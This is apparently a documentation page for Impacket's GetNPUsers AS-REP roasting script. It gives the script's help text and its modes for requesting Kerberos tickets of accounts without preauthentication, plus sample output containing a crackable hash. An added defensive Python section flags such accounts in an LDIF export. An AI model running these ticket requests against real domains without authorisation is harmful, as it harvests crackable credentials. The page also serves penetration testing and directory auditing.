Queries the target domain for users with ‘Do not require Kerberos preauthentication’ set and exports their TGTs for cracking (ASREPRoasting).


Install Impacket.

Usage [-h] [-request] [-outputfile OUTPUTFILE] [-format {hashcat,john}] [-usersfile USERSFILE] [-ts] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address]
                     [-dc-host hostname]


Impacket v0.12.0.dev1+20230803.144057.e2092339 - Copyright 2023 Fortra

positional arguments:
  target                [[domain/]username[:password]]

  -h, --help            show this help message and exit
  -request              Requests TGT for users and output them in JtR/hashcat format (default False)
  -outputfile OUTPUTFILE
                        Output filename to write ciphers in JtR/hashcat format
  -format {hashcat,john}
                        format to save the AS_REQ of users without pre-authentication. Default is hashcat
  -usersfile USERSFILE  File with user per line to test
  -ts                   Adds timestamp to every logging output
  -debug                Turn DEBUG output ON

  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)

  -dc-ip ip address     IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter
  -dc-host hostname     Hostname of the domain controller to use. If ommited, the domain part (FQDN) specified in the account parameter will be used

There are a few modes for using this script

1. Get a TGT for a user: -no-pass

For this operation you don't need john.doe's password. It is important, though, to specify -no-pass in the script;
otherwise a badpwdcount entry will be added to the user.

2. Get a list of users with UF_DONT_REQUIRE_PREAUTH set or

This will list all the users in the domain that have UF_DONT_REQUIRE_PREAUTH set.
However, it will require you to have emily's password. (If you don't specify it, the script will prompt for it.)

3. Request TGTs for all users -request or

4. Request TGTs for users in a file -no-pass -usersfile users.txt

For this operation you don't need credentials.
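
The check behind mode 2 can also be run from the defender's side against a directory export. The following is an added example, not part of Impacket or the original page: it reads an LDIF dump, flags every account whose userAccountControl has the UF_DONT_REQUIRE_PREAUTH bit (0x400000) set, and sorts enabled, privileged accounts first. The sample records, account names and domain are constructed, and it assumes the export contains the sAMAccountName, userAccountControl and adminCount attributes.

```python
UF_ACCOUNTDISABLE = 0x00000002        # account is disabled
UF_DONT_REQUIRE_PREAUTH = 0x00400000  # "Do not require Kerberos preauthentication"

# Constructed sample export (made-up accounts and domain, not real data).
SAMPLE_LDIF = """\
dn: CN=alice,CN=Users,DC=example,DC=test
sAMAccountName: alice
userAccountControl: 512

dn: CN=bob,OU=Admins,
 DC=example,DC=test
sAMAccountName: bob
userAccountControl: 4194816
adminCount: 1

dn: CN=svc-old,CN=Users,DC=example,DC=test
sAMAccountName: svc-old
userAccountControl: 4194818
"""

def parse_ldif(text):
    """Split LDIF into dicts; unfolds continuation lines (leading space)."""
    records = []
    for block in text.replace("\n ", "").split("\n\n"):
        rec = {}
        for line in block.splitlines():
            key, sep, value = line.partition(":")
            if sep and not line.startswith("#"):
                rec[key.strip().lower()] = value.strip()
        if rec:
            records.append(rec)
    return records

def audit_preauth(records):
    """Return accounts with pre-auth disabled; enabled and privileged first."""
    findings = []
    for rec in records:
        uac = rec.get("useraccountcontrol", "")
        if not uac.isdigit() or not int(uac) & UF_DONT_REQUIRE_PREAUTH:
            continue
        findings.append({
            "account": rec.get("samaccountname", "?"),
            "enabled": not int(uac) & UF_ACCOUNTDISABLE,
            "privileged": rec.get("admincount") == "1",
        })
    return sorted(findings, key=lambda f: (not f["enabled"], not f["privileged"]))

if __name__ == "__main__":
    print(*audit_preauth(parse_ldif(SAMPLE_LDIF)), sep="\n")
```

Each account reported as enabled should have the ‘Do not require Kerberos preauthentication’ setting cleared unless a documented dependency needs it, in which case it should carry a long random password.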

Examples -usersfile users -dc-ip
Impacket v0.9.24.dev1+20210726.180101.1636eaab - Copyright 2021 SecureAuth Corporation

[-] User johndo doesn't have UF_DONT_REQUIRE_PREAUTH set
[email protected]:0507c99ed0c44924dee1bd4fdb34e0b9$e6abe0cd017c45688ff4d667183ce9c8cb171635250c7a5d1f12666549466ecb367e6445751b867a44f483e8b255ebd039ea7375229a1c6763eb61965d34945b8500058e36dd32fadd6bdc5dc5fff5ef6ebc90343bdf177984852b3536fb12ab4a21f8cdee93339e7fc97d3028eb1f7643e1c9156f7d1facd658dd5b2061572f615abc4ea4007294ee648f38af428ef5f7045bb194c44bfef4f39f14ad02e982f74ef49a5a904e874ce1c2b5a38b61a4b30b58b2b521f4f81cdaee348b497a9ca757fe33e30e9ef6c7911963e120e905f5cf063964b5a13f7d9668a1f3e63466d1c0d18d9e76e31a8bec236fff42fa928dac
[-] User johndo-adm doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User janedo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
